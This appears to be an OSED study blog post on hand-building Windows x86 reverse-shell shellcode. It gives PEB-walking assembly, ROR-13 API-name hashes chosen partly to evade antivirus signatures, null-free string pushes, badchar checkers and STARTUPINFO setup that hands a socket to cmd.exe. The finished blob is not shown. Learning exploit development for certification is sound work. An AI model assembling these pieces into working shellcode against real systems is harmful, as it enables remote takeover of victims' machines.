OSED Notes: Writing Custom Shellcode From Scratch
An OSED-flavoured walkthrough of building a working Windows x86 reverse-shell shellcode by hand — no msfvenom, no luck, just hash-based API resolution, manual PEB walks, and an annotated final blob.
By Umair Sabir
I'm working through OSED right now, and the single biggest wall most people hit is learning to stop reaching for msfvenom. The course expects you to write your own shellcode: bytes that survive your bad-character filter, fit in your buffer, and don't import a single function the loader has to fix up.
This post is the lab notebook version of how I build a working cmd.exe reverse shell for Windows x86 from scratch. The final shellcode in this post is ~280 bytes, has no null bytes, no 0x0a, no 0x0d, and resolves every API by hash at runtime.
The constraints
Before any byte gets written, define the contract:
\x20 (space), \x25 (%), \x26 (&), \x2b (+) and \x3d (=) are the kind of badchars you find in buffers that go through URL or HTTP form decoding. We bake the constraints into the egg.
The plan in pictures
A reverse shell on Windows is six API calls in a trench coat. Here's the flow:
Walking the PEB
The first thing position-independent shellcode has to do on Windows is find a base address. We can't call kernel32.dll!LoadLibraryA if we don't even know where kernel32.dll is loaded.
Every running process has a Process Environment Block (PEB). On x86, a pointer to it sits at fs:[0x30] (fs points at the current thread's TEB), and chasing pointers from there gets us a doubly-linked list of loaded modules. The third entry in InMemoryOrderModuleList, after the executable itself and ntdll.dll, is kernel32.dll.
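; nasm syntax
xor eax, eax                ; eax = 0, so fs:0x30 can be addressed without null bytes
mov eax, [fs:eax + 0x30]    ; TEB->ProcessEnvironmentBlock = PEB
mov eax, [eax + 0x0c]       ; PEB->Ldr = PEB_LDR_DATA
mov eax, [eax + 0x14]       ; InMemoryOrderModuleList.Flink = 1st entry (the .exe)
mov eax, [eax]              ; 2nd entry: ntdll.dll
mov eax, [eax]              ; 3rd entry: kernel32.dll
mov ebx, [eax + 0x10]       ; DllBase (entry+0x18, we hold entry+0x08): ebx = kernel32 base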
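The offsets here have been stable across modern Windows versions. They line up with the structure definitions in winternl.h (where most of the fields involved are only named Reserved), and they hold for any 32-bit process, including 32-bit processes running under WoW64 on 64-bit Windows. Native x64 code is a different story: the PEB pointer lives at gs:[0x60] and every offset changes.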
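To see where those numbers come from, here's a sketch that models the 32-bit views of TEB, PEB, PEB_LDR_DATA and LDR_DATA_TABLE_ENTRY with ctypes, following the winternl.h field order. Each structure is truncated right after the field the walk needs, and every pointer is modelled as a 4-byte c_uint32 so the layout matches an x86 process even when the script runs on 64-bit Python. The "32" suffixes are my own labels, not Windows type names.

```python
import ctypes
from ctypes import c_uint8, c_uint32

PVOID32 = c_uint32  # pointers are 4 bytes in a 32-bit process


class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [("Flink", PVOID32), ("Blink", PVOID32)]


class TEB32(ctypes.Structure):  # truncated: fs points here, we only need +0x30
    _fields_ = [("Reserved1", PVOID32 * 12), ("ProcessEnvironmentBlock", PVOID32)]


class PEB32(ctypes.Structure):  # truncated after Ldr
    _fields_ = [
        ("Reserved1", c_uint8 * 2),
        ("BeingDebugged", c_uint8),
        ("Reserved2", c_uint8 * 1),
        ("Reserved3", PVOID32 * 2),
        ("Ldr", PVOID32),
    ]


class PEB_LDR_DATA32(ctypes.Structure):  # truncated after the list head
    _fields_ = [
        ("Reserved1", c_uint8 * 8),
        ("Reserved2", PVOID32 * 3),
        ("InMemoryOrderModuleList", LIST_ENTRY32),
    ]


class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):  # truncated after DllBase
    _fields_ = [
        ("Reserved1", PVOID32 * 2),
        ("InMemoryOrderLinks", LIST_ENTRY32),
        ("Reserved2", PVOID32 * 2),
        ("DllBase", PVOID32),
    ]


# Flink points at the InMemoryOrderLinks field embedded in each entry, not at
# the start of the entry, so DllBase must be addressed relative to that link.
DLLBASE_FROM_LINK = (LDR_DATA_TABLE_ENTRY32.DllBase.offset
                     - LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset)

if __name__ == "__main__":
    print(f"TEB->ProcessEnvironmentBlock        0x{TEB32.ProcessEnvironmentBlock.offset:02x}")
    print(f"PEB->Ldr                            0x{PEB32.Ldr.offset:02x}")
    print(f"PEB_LDR_DATA->InMemoryOrderModList  0x{PEB_LDR_DATA32.InMemoryOrderModuleList.offset:02x}")
    print(f"DllBase relative to the list link   0x{DLLBASE_FROM_LINK:02x}")
```

The last line is the one people trip over: because each Flink lands 0x08 bytes into the entry, the assembly reads DllBase at +0x10 rather than at its nominal +0x18.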
Resolving APIs by hash
We don't want a literal "LoadLibraryA" string in our shellcode for two reasons: (1) plaintext API names are exactly the kind of bytes AV signatures key on, and (2) we'd have to push every name onto the stack anyway, which costs far more than a 4-byte hash. So instead we hash. The classic algorithm is ROR-13 with a running sum:
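def ror13(name: bytes) -> int:
    """ROR-13 additive hash over the exact export name (NUL terminator not hashed)."""
    h = 0
    for c in name:  # iterating a bytes object yields ints
        h = ((h >> 13) | (h << (32 - 13))) & 0xFFFFFFFF  # 32-bit rotate right by 13
        h = (h + c) & 0xFFFFFFFF                          # then add the character
    return h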
Run that against every API you need and bake the 4-byte hash into your shellcode. Then at runtime the shellcode walks the export address table of kernel32.dll, hashes each name, and compares against the hash you embedded.
LoadLibraryA -> 0xEC0E4E8E
GetProcAddress -> 0x7C0DFCAA
WSAStartup -> 0x3BFCEDCB
WSASocketA -> 0xADF509D9
connect -> 0x60AAF9EC
CreateProcessA -> 0x16B3FE72
ExitProcess -> 0x73E2D87E
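Each hash ends up in the shellcode as a push imm32, so its four little-endian bytes are bound by the same badchar contract as everything else. Here's a sketch of a pre-flight check, assuming the badchar set from the verification one-liner further down; ror_hash is a generalised copy of ror13 above so the block runs on its own. With that set, GetProcAddress trips: 0x7C0DFCAA is emitted as AA FC 0D 7C, and 0x0D is a badchar. The pick_rotation helper (a hypothetical name) tries 13 first and then every other rotation count; if you switch, the shellcode's runtime hashing loop has to use the same count.

```python
from __future__ import annotations

# Badchar contract, as used by the shellcode.bin verification one-liner.
BADCHARS = frozenset(b"\x00\x0a\x0d\x20\x25\x26\x2b\x3d")

API_NAMES = ["LoadLibraryA", "GetProcAddress", "WSAStartup", "WSASocketA",
             "connect", "CreateProcessA", "ExitProcess"]


def ror_hash(name: bytes, rot: int = 13) -> int:
    """Rotate-right-and-add hash; rot=13 reproduces ror13()."""
    h = 0
    for c in name:
        h = ((h >> rot) | (h << (32 - rot))) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


def bad_bytes(value: int) -> set[int]:
    """Badchars among the four bytes that push imm32 emits (little-endian)."""
    return set(value.to_bytes(4, "little")) & BADCHARS


def pick_rotation(names: list[str]) -> int | None:
    """First rotation count (13 tried first) whose hashes are all clean."""
    for rot in [13, *range(1, 13), *range(14, 32)]:
        if not any(bad_bytes(ror_hash(n.encode(), rot)) for n in names):
            return rot
    return None  # nothing works: change the scheme, not just the count


if __name__ == "__main__":
    for name in API_NAMES:
        h = ror_hash(name.encode())
        bad = bad_bytes(h)
        note = "  BAD: " + " ".join(f"0x{b:02x}" for b in sorted(bad)) if bad else ""
        print(f"{name:15} 0x{h:08X}{note}")
    print("first clean rotation:", pick_rotation(API_NAMES))
```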
Pitfall I keep hitting: be careful which DLL exports each function.
connect lives in ws2_32.dll, not kernel32.dll (so do WSAStartup and WSASocketA). Your hash walker has to scan the right module, which is why the first call after the PEB walk is LoadLibraryA("ws2_32"): its return value is the ws2_32.dll base address you walk next.
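Whichever module base you hand it, the runtime lookup is the same: walk AddressOfNames, hash each name, and on a match use the same index into AddressOfNameOrdinals to pick the slot in AddressOfFunctions. The sketch below models that in Python, with plain lists standing in for the three arrays that IMAGE_EXPORT_DIRECTORY points to. The ExportDirectory and resolve names are hypothetical, and while the export names are real ws2_32 exports, the RVAs, ordinals and the 0x10000000 base are invented sample data.

```python
from __future__ import annotations

from dataclasses import dataclass


def ror13(name: bytes) -> int:
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 13
        h = (h + c) & 0xFFFFFFFF
    return h


@dataclass
class ExportDirectory:
    """Toy stand-in for the arrays an IMAGE_EXPORT_DIRECTORY points to.
    In memory these are RVAs relative to the module base; here they are lists."""
    names: list[bytes]        # AddressOfNames (sorted ASCII names)
    name_ordinals: list[int]  # AddressOfNameOrdinals: index into functions
    functions: list[int]      # AddressOfFunctions: function RVAs


def resolve(base: int, exports: ExportDirectory, wanted: int) -> int | None:
    """Return base + RVA of the export whose ROR-13 name hash equals wanted."""
    for i, name in enumerate(exports.names):
        if ror13(name) == wanted:
            return base + exports.functions[exports.name_ordinals[i]]
    return None  # wrong module, wrong case, or a bad entry in the hash table


# Hypothetical sample data: real export names, invented numbers.
SAMPLE = ExportDirectory(
    names=[b"WSASocketA", b"WSAStartup", b"connect"],
    name_ordinals=[2, 0, 1],
    functions=[0x1100, 0x2200, 0x3300],
)
BASE = 0x10000000  # stands in for the base LoadLibraryA("ws2_32") returns

if __name__ == "__main__":
    addr = resolve(BASE, SAMPLE, 0x60AAF9EC)  # ror13(b"connect")
    print(hex(addr) if addr is not None else "not found")
```

Looking up LoadLibraryA in this table returns None, which is exactly the failure you get at runtime when the walker scans the wrong module.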
Stack-pushing strings without nulls
"ws2_32" is 6 characters, 7 bytes with its null terminator. We need that terminator on the stack but no nulls in the shellcode itself. Trick: push the string backwards as DWORDs and let a zeroed register supply the trailing zero bytes:
xor eax, eax            ; eax = 0
mov ax, 0x3233          ; eax = 0x00003233 -> bytes "32\0\0" in memory
push eax                ; stack: "32\0\0" (terminator comes from the register)
push 0x5f327377         ; stack: "ws2_32\0\0" ("ws2_" in little-endian)
push esp                ; lpLibFileName for LoadLibraryA -> "ws2_32"
This is the cleaner pattern most people use: push backwards, and source every zero byte from a register (xor it, then write only the low bytes you need). The point is: never let \x00 show up in the bytes you actually emit.
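Working out the DWORDs by hand gets old fast. This sketch (stack_pushes is a hypothetical helper name) pads the string to a DWORD boundary with at least one NUL, splits it into little-endian DWORDs, and returns them in push order, flagging any DWORD that contains a zero byte and therefore has to be built from a zeroed register instead of pushed as an immediate.

```python
def stack_pushes(s: bytes) -> list[int]:
    """DWORDs in the order they must be pushed so that esp ends up pointing
    at a NUL-terminated copy of s (x86 is little-endian)."""
    padded = s + b"\x00" * (4 - len(s) % 4)  # always at least one NUL
    chunks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    # The stack grows down, so the last chunk has to be pushed first.
    return [int.from_bytes(c, "little") for c in reversed(chunks)]


if __name__ == "__main__":
    for dword in stack_pushes(b"ws2_32"):
        raw = dword.to_bytes(4, "little")
        note = "  <- contains NUL: build it from a zeroed register" if 0 in raw else ""
        print(f"push 0x{dword:08x}  ; {raw!r}{note}")
```

For "ws2_32" it yields 0x00003233 (flagged, hence the mov ax trick) followed by 0x5f327377.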
The annotated final blob
After assembly + encoding, here's a slice of the final shellcode (truncated; full file in the repo):
I verify it survives my badchar set with a one-liner:
python3 -c "import sys; bad=b'\\x00\\x0a\\x0d\\x20\\x25\\x26\\x2b\\x3d'; \
data=open('shellcode.bin','rb').read(); \
print('CLEAN' if not any(b in data for b in bad) else 'DIRTY: %r' % \
[hex(b) for b in data if b in bad])"
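When the one-liner says DIRTY, the next question is where. This slightly longer sketch reports the offset and a few bytes of context for each hit, so you can map it back to an instruction in your assembly listing. The find_badchars name and the default shellcode.bin path are assumptions.

```python
import sys

BADCHARS = b"\x00\x0a\x0d\x20\x25\x26\x2b\x3d"


def find_badchars(data: bytes, bad: bytes = BADCHARS) -> list[tuple[int, int]]:
    """Return (offset, byte) for every badchar occurrence in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def main(path: str) -> int:
    with open(path, "rb") as f:
        data = f.read()
    hits = find_badchars(data)
    if not hits:
        print(f"CLEAN ({len(data)} bytes)")
        return 0
    for off, b in hits:
        context = data[max(0, off - 4):off + 4].hex(" ")  # 4 bytes either side
        print(f"offset 0x{off:04x}: 0x{b:02x}  context: {context}")
    return 1  # non-zero exit so it can gate a build script


if __name__ == "__main__":
    sys.exit(main(sys.argv[1] if len(sys.argv) > 1 else "shellcode.bin"))
```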
Then I plug it into a tiny C harness and watch nc on my attacker box light up:
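Getting the blob into a C harness means turning shellcode.bin into a C literal. A small sketch for that; the to_c_array name, the shellcode variable name and 16 bytes per line are arbitrary choices. Every byte is emitted as a two-digit \xHH escape followed by another escape or a closing quote, so C's greedy hex-escape parsing can't swallow the next character.

```python
import sys


def to_c_array(data: bytes, name: str = "shellcode", per_line: int = 16) -> str:
    """Render raw bytes as a C string literal split across lines."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = "".join(f"\\x{b:02x}" for b in data[i:i + per_line])
        lines.append(f'    "{chunk}"')  # adjacent literals concatenate in C
    body = "\n".join(lines) if lines else '    ""'
    return f"unsigned char {name}[] =\n{body};\n"


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "shellcode.bin"
    with open(path, "rb") as f:
        print(to_c_array(f.read()), end="")
```

Note that sizeof(shellcode) in C counts the implicit trailing NUL, so use sizeof(shellcode) - 1 if the harness needs the exact length.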
Things OSED candidates burn time on
A list of mistakes I made so you don't have to:
- Forgetting that stale stack contents matter for some APIs. WSASocketA fails with WSAEFAULT if its lpProtocolInfo argument (an LPWSAPROTOCOL_INFOA) points somewhere invalid, and since shellcode rarely checks for INVALID_SOCKET, the failure looks silent. Push explicit 0s; don't trust whatever was on the stack.
- Hashing with the wrong case. Windows export names are case-sensitive, so loadlibrarya and LoadLibraryA hash differently. Use the exact string from dumpbin /exports.
- Embedding a null byte in your hash table. A hash like 0x00ABCDEF will tank your shellcode, and so will any other badchar in the four bytes you push. Re-roll the hash function (a different rotation count, or a constant seed mixed in identically at build time and at runtime) until no hash contains a bad byte.
- Forgetting that CreateProcessA's STARTUPINFO is 0x44 bytes. Zero all of it, then patch the fields you need: cb = 0x44, dwFlags = 0x100 (STARTF_USESTDHANDLES), and hStdInput/hStdOutput/hStdError = the socket. Also pass bInheritHandles = TRUE, or cmd.exe never inherits the socket.
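To see where those fields sit, here's a sketch of the 32-bit STARTUPINFOA layout in ctypes, with every pointer and handle modelled as a 4-byte integer (native ctypes pointer types would be 8 bytes on 64-bit Python). It confirms the 0x44 size and gives the offsets you would patch from assembly. STARTUPINFOA32 and build_startupinfo are my own names, and the 0x1C4 socket handle is made up.

```python
import ctypes
from ctypes import c_uint16, c_uint32

DWORD, WORD = c_uint32, c_uint16
PTR32 = c_uint32  # LPSTR / LPBYTE / HANDLE are 4 bytes in a 32-bit process

STARTF_USESTDHANDLES = 0x100


class STARTUPINFOA32(ctypes.Structure):
    _fields_ = [
        ("cb", DWORD), ("lpReserved", PTR32), ("lpDesktop", PTR32),
        ("lpTitle", PTR32), ("dwX", DWORD), ("dwY", DWORD),
        ("dwXSize", DWORD), ("dwYSize", DWORD), ("dwXCountChars", DWORD),
        ("dwYCountChars", DWORD), ("dwFillAttribute", DWORD),
        ("dwFlags", DWORD), ("wShowWindow", WORD), ("cbReserved2", WORD),
        ("lpReserved2", PTR32), ("hStdInput", PTR32),
        ("hStdOutput", PTR32), ("hStdError", PTR32),
    ]


def build_startupinfo(sock: int) -> bytes:
    """Zeroed STARTUPINFOA with only the reverse-shell fields patched."""
    si = STARTUPINFOA32()  # ctypes zero-initialises every field
    si.cb = ctypes.sizeof(si)
    si.dwFlags = STARTF_USESTDHANDLES
    si.hStdInput = si.hStdOutput = si.hStdError = sock
    return bytes(si)


if __name__ == "__main__":
    for field in ("cb", "dwFlags", "hStdInput", "hStdOutput", "hStdError"):
        print(f"{field:11} +0x{getattr(STARTUPINFOA32, field).offset:02x}")
    print(build_startupinfo(0x1C4).hex(" "))
```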
Wrapping up
OSED doesn't reward speed — it rewards understanding. Every piece of "magic" in your shellcode should be something you can explain. If you're staring at a hash table and you don't know which DLL each function comes from, stop coding and read winternl.h for an hour. Future you will thank past you.
I'll publish the full reusable assembly source + encoder in a follow-up post. In the meantime, the Active Directory attack-paths post shows what you do after the shellcode lands.